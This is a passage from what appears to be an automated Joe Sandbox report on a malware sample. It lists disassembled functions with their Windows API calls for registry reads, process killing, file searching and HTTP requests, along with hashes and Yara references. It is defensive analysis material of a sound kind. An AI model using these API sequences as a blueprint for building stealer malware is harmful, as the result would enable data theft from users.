                                            • Instruction ID: 3c0b6b25f77c957b2ea242d158c0127a4b2911392d59b63edc65d8ae69b5b275
                                            • Opcode Fuzzy Hash: 9501ecd15ebe4f0bd675d82c20a0d288bf0466f34ff5fe808b0cf600256a10e0
                                            • Instruction Fuzzy Hash: 735142B1D406286BCB19FB61DC94EFD733AAF54701F4045EEA64A72091EE305B88CE56
                                            Function 004149D0 Relevance: 10.6, APIs: 7, Instructions: 101stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrcatA.KERNEL32(?,009D0750,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00414A2B
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414A51
                                            • lstrcatA.KERNEL32(?,?), ref: 00414A70
                                            • lstrcatA.KERNEL32(?,?), ref: 00414A84
                                            • lstrcatA.KERNEL32(?,009CC228), ref: 00414A97
                                            • lstrcatA.KERNEL32(?,?), ref: 00414AAB
                                            • lstrcatA.KERNEL32(?,009D0EA8), ref: 00414ABF
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                              • Part of subcall function 004147C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                              • Part of subcall function 004147C0: HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                              • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147F6
                                              • Part of subcall function 004147C0: FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                            • String ID:
                                            • API String ID: 167551676-0
                                            • Opcode ID: 58dba1b2860d6428ec47f78fe100ccd670a24cdb85e4827545ce54862c89c4bc
                                            • Instruction ID: a5c2d428b28de13255d2ac7946ab4b1842291e6be0275f36c7222d1bbee1b90f
                                            • Opcode Fuzzy Hash: 58dba1b2860d6428ec47f78fe100ccd670a24cdb85e4827545ce54862c89c4bc
                                            • Instruction Fuzzy Hash: F93160B2D0421867CB14FBB0DC95EDD733EAB48704F40458EB20596091EE78A7C8CB99
                                            Function 0041856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                            • wsprintfA.USER32 ref: 004185E9
                                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                            • RegQueryValueExA.ADVAPI32(00000000,009D0498,00000000,000F003F,?,00000400), ref: 0041867C
                                            • lstrlenA.KERNEL32(?), ref: 00418691
                                            • RegQueryValueExA.ADVAPI32(00000000,009D0438,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B3C), ref: 00418729
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418798
                                            • RegCloseKey.ADVAPI32(00000000), ref: 004187AA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                            • String ID: %s\%s
                                            • API String ID: 3896182533-4073750446
                                            • Opcode ID: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
                                            • Instruction ID: 130e8712b2d17d0f4a3aa70f9b32a38deb323cc32c4c6a80807e33934adfa5f1
                                            • Opcode Fuzzy Hash: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
                                            • Instruction Fuzzy Hash: 0F211B71A112189BDB24DB54DC85FE9B3B9FB48704F1081D9E609A6180DF746AC5CF98
                                            Function 004199A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004199C5
                                            • Process32First.KERNEL32(0040A056,00000128), ref: 004199D9
                                            • Process32Next.KERNEL32(0040A056,00000128), ref: 004199F2
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419A6C
                                            • CloseHandle.KERNEL32(00000000), ref: 00419A79
                                            • CloseHandle.KERNEL32(0040A056), ref: 00419A88
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                            • String ID:
                                            • API String ID: 2696918072-0
                                            • Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                            • Instruction ID: 88ad4043d03276f3ee8d31f644ab7db47d0d0c060b431017ba6a9ada5f45e9a4
                                            • Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                            • Instruction Fuzzy Hash: 06211A70900258ABDB25DFA1DC98BEEB7B9BF48304F0041C9E509A6290D7789FC4CF51
                                            Function 02454A67 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AA1
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AB8
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454ACF
                                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02454AF0
                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 02454B00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ??2@$CrackInternetlstrlen
                                            • String ID: <
                                            • API String ID: 1683549937-4251816714
                                            • Opcode ID: 38fa8a5d9863c97f5ae2059ef35c5811aeca24f1de16073e8a310d0be37fc7a1
                                            • Instruction ID: d9a9a47fd235f55d05545ab20c2df51f46e5de8092aedb49bb2e6a2a9ab080e0
                                            • Opcode Fuzzy Hash: 38fa8a5d9863c97f5ae2059ef35c5811aeca24f1de16073e8a310d0be37fc7a1
                                            • Instruction Fuzzy Hash: 95212C71D00219EBDF14DFA5EC49AED7B75FF44320F108229E925A7290EB706A05CF91
                                            Function 02469C07 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02469C2C
                                            • Process32First.KERNEL32(0245A2BD,00000128), ref: 02469C40
                                            • Process32Next.KERNEL32(0245A2BD,00000128), ref: 02469C59
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 02469CB5
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 02469CD3
                                            • CloseHandle.KERNEL32(00000000), ref: 02469CE0
                                            • CloseHandle.KERNEL32(0245A2BD), ref: 02469CEF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                            • String ID:
                                            • API String ID: 2696918072-0
                                            • Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                            • Instruction ID: 4f07c557e1940f6f261f1ea4e2410b3eba9bd4410bd074fc162b2e46e5d7411f
                                            • Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                            • Instruction Fuzzy Hash: A621FC75904218EBDB25DF51DC8CBEEB7B6BB48304F0041CAE50AA7294D7B49B84CF91
                                            Function 00417820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
                                            • HeapAlloc.KERNEL32(00000000), ref: 0041783B
                                            • RegOpenKeyExA.ADVAPI32(80000002,009CC668,00000000,00020119,00000000), ref: 0041786D
                                            • RegQueryValueExA.ADVAPI32(00000000,009D0450,00000000,00000000,?,000000FF), ref: 0041788E
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00417898
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID: Windows 11
                                            • API String ID: 3466090806-2517555085
                                            • Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                            • Instruction ID: 90abcce2ecfc2a5b8cd512a74185dd25ab23219ddadcc09848e79f4871c60c5e
                                            • Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                            • Instruction Fuzzy Hash: FD01A274E09304BBEB00DBE4ED49FAE7779EF48700F00419AFA04A7290E7749A40CB55
                                            Function 02467A87 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02467A9B
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02467AA2
                                            • RegOpenKeyExA.ADVAPI32(80000002,006D6D98,00000000,00020119,00000000), ref: 02467AD4
                                            • RegQueryValueExA.ADVAPI32(00000000,006D6E34,00000000,00000000,?,000000FF), ref: 02467AF5
                                            • RegCloseKey.ADVAPI32(00000000), ref: 02467AFF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID: Windows 11
                                            • API String ID: 3225020163-2517555085
                                            • Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                            • Instruction ID: cce48ebf3cbb60758c1fccd8b2527221629925c9bc30ab10dbbe4cc4eba6fa00
                                            • Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                            • Instruction Fuzzy Hash: 94014F75E05305BBDB00DBE0ED49F6EB7B9EB48B05F104196FA0596291E7709A40CB92
                                            Function 004178B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178C4
                                            • HeapAlloc.KERNEL32(00000000), ref: 004178CB
                                            • RegOpenKeyExA.ADVAPI32(80000002,009CC668,00000000,00020119,00417849), ref: 004178EB
                                            • RegQueryValueExA.ADVAPI32(00417849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041790A
                                            • RegCloseKey.ADVAPI32(00417849), ref: 00417914
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID: CurrentBuildNumber
                                            • API String ID: 3466090806-1022791448
                                            • Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                            • Instruction ID: 4c9302de3449b24d107dc6acc84b9b99571be3b3dcaa7f8b3677a924de38e7e6
                                            • Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                            • Instruction Fuzzy Hash: 51014FB5E45309BBEB00DBE4DC4AFAEB779EF44700F10459AF605A6281E774AA408B91
                                            Function 00419470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileA.KERNEL32(>=A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413D3E,?), ref: 0041948C
                                            • GetFileSizeEx.KERNEL32(000000FF,>=A), ref: 004194A9
                                            • CloseHandle.KERNEL32(000000FF), ref: 004194B7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleSize
                                            • String ID: >=A$>=A
                                            • API String ID: 1378416451-3536956848
                                            • Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                            • Instruction ID: 3a34b71ed32a5e038d40ec36a38ffc71a9509a973990dc3d9b0a1b42c7eefbe1
                                            • Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                            • Instruction Fuzzy Hash: F2F04F39E08208BBDB10DFB0EC59F9E77BAAB48710F14C655FA15A72C0E6749A418B85
                                            Function 02457597 Relevance: 9.1, APIs: 6, Instructions: 149registrymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02457601
                                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02457678
                                            • StrStrA.SHLWAPI(00000000,0042191C,00000000), ref: 024576D4
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02457719
                                            • HeapFree.KERNEL32(00000000), ref: 02457720
                                              • Part of subcall function 024594F7: vsprintf_s.MSVCRT ref: 02459512
                                            • task.LIBCPMTD ref: 0245781C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                            • String ID:
                                            • API String ID: 700816787-0
                                            • Opcode ID: a5f9a1fdff9748d1a9f61811aedc3a3ddb92c22d9917be86b6004c4e8ac4beea
                                            • Instruction ID: dd083e18704c0a8ca89ab8c14acc60156345da64bf27a2ddb5518717f82d91ac
                                            • Opcode Fuzzy Hash: a5f9a1fdff9748d1a9f61811aedc3a3ddb92c22d9917be86b6004c4e8ac4beea
                                            • Instruction Fuzzy Hash: 4C61FDB590416C9BDB24DB50CC94FE9B7B9BF44300F0081EAE689A6241DFB1ABC5CF91
                                            Function 02465777 Relevance: 9.1, APIs: 6, Instructions: 138stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 02456537: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 02456598
                                              • Part of subcall function 02456537: StrCmpCA.SHLWAPI(?,006D6E80), ref: 024565BA
                                              • Part of subcall function 02456537: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 024565EC
                                              • Part of subcall function 02456537: HttpOpenRequestA.WININET(00000000,00421B58,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 0245663C
                                              • Part of subcall function 02456537: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02456676
                                              • Part of subcall function 02456537: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02456688
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • StrCmpCA.SHLWAPI(00000000,00421084,00000000), ref: 024657CF
                                            • lstrlen.KERNEL32(00000000), ref: 024657E6
                                              • Part of subcall function 02469227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02469249
                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 0246581B
                                            • lstrlen.KERNEL32(00000000), ref: 0246583A
                                            • strtok.MSVCRT(00000000,?), ref: 02465855
                                            • lstrlen.KERNEL32(00000000), ref: 02465865
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                            • String ID:
                                            • API String ID: 3532888709-0
                                            • Opcode ID: 54e8cafad978ddb8dec0665b67f894f20834dab0c8411e0b23f3d73ca0531f9d
                                            • Instruction ID: 0e50488a52f32ed9a781bd942522f8abcaabea6b19e7b3cc646375e1a1980588
                                            • Opcode Fuzzy Hash: 54e8cafad978ddb8dec0665b67f894f20834dab0c8411e0b23f3d73ca0531f9d
                                            • Instruction Fuzzy Hash: E851F830900618ABCB18FF61CD99EFD7736AF10301F90446EE80A665A0EF30AB49CF52
                                            Function 024675B7 Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 024675C5
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • OpenProcess.KERNEL32(001FFFFF,00000000,024677F4,004205C5), ref: 02467603
                                            • memset.MSVCRT ref: 02467651
                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 024677A5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: OpenProcesslstrcpymemset
                                            • String ID:
                                            • API String ID: 224852652-0
                                            • Opcode ID: 84a0e27ea1e6d6cd779c01b8e10f97d713d6d446aadd826403742b4761b04bd3
                                            • Instruction ID: 14cb4c12114b6fbdc00ae052e2819609f13981af39271c71f74dcff67158bf4b
                                            • Opcode Fuzzy Hash: 84a0e27ea1e6d6cd779c01b8e10f97d713d6d446aadd826403742b4761b04bd3
                                            • Instruction Fuzzy Hash: 7B513EB0D002189BDB24DB95DC88BFEB7B5EF04709F1081AED615B6281EB746A88CF55
                                            Function 00414300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00414325
                                            • RegOpenKeyExA.ADVAPI32(80000001,009D0F28,00000000,00020119,?), ref: 00414344
                                            • RegQueryValueExA.ADVAPI32(?,009D0738,00000000,00000000,00000000,000000FF), ref: 00414368
                                            • RegCloseKey.ADVAPI32(?), ref: 00414372
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414397
                                            • lstrcatA.KERNEL32(?,009D1428), ref: 004143AB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                            • String ID:
                                            • API String ID: 2623679115-0
                                            • Opcode ID: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
                                            • Instruction ID: 95163f332e2e8486d22fa14c8026e7b1b291c890fe90cbe7f90fb3e747a5c624
                                            • Opcode Fuzzy Hash: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
                                            • Instruction Fuzzy Hash: B641B8B6D001086BDB14EBA0EC46FEE773DAB8C300F04855EB7155A1C1EA7557888BE1
                                            Function 02464567 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0246458C
                                            • RegOpenKeyExA.ADVAPI32(80000001,006D6ED8,00000000,00020119,?), ref: 024645AB
                                            • RegQueryValueExA.ADVAPI32(?,006D6AD4,00000000,00000000,00000000,000000FF), ref: 024645CF
                                            • RegCloseKey.ADVAPI32(?), ref: 024645D9
                                            • lstrcat.KERNEL32(?,00000000), ref: 024645FE
                                            • lstrcat.KERNEL32(?,006D6B68), ref: 02464612
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                            • String ID:
                                            • API String ID: 2623679115-0
                                            • Opcode ID: 999cfbed4ff8a03412d5231f3ea01ef0dc387c4afc54b3402d2d603eb4b95bc4
                                            • Instruction ID: 0405afce5b218a3f1832a2028d36385c111bdc32b3addf7f1f82168fbe5f53e7
                                            • Opcode Fuzzy Hash: 999cfbed4ff8a03412d5231f3ea01ef0dc387c4afc54b3402d2d603eb4b95bc4
                                            • Instruction Fuzzy Hash: A9415972D001186BDB14FBA1DC55FFE773EAB48300F04859EF65956180EAB5AB888FE1
                                            Function 004137B0 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • strtok_s.MSVCRT ref: 004137D8
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • strtok_s.MSVCRT ref: 00413921
                                              • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009C9490,?,004210F4,?,00000000), ref: 0041AB3B
                                              • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpystrtok_s$lstrlen
                                            • String ID:
                                            • API String ID: 3184129880-0
                                            • Opcode ID: 6c6fb7d06333238994955fa4e9c6fc16004326b07765d99504ffdab069fb4719
                                            • Instruction ID: b6ea97cb77591b20574b5f8bad6a91ea9d9e82a59cceccb6aeafc47a8efa6348
                                            • Opcode Fuzzy Hash: 6c6fb7d06333238994955fa4e9c6fc16004326b07765d99504ffdab069fb4719
                                            • Instruction Fuzzy Hash: 9541A471E101099BCB04EFA5D945AEEB779AF44314F00801EF51677291EB78AA84CFAA
                                            Function 02459CB7 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 02459CD1
                                            • InternetOpenUrlA.WININET(00000000,00421250,00000000,00000000,80000000,00000000), ref: 02459D12
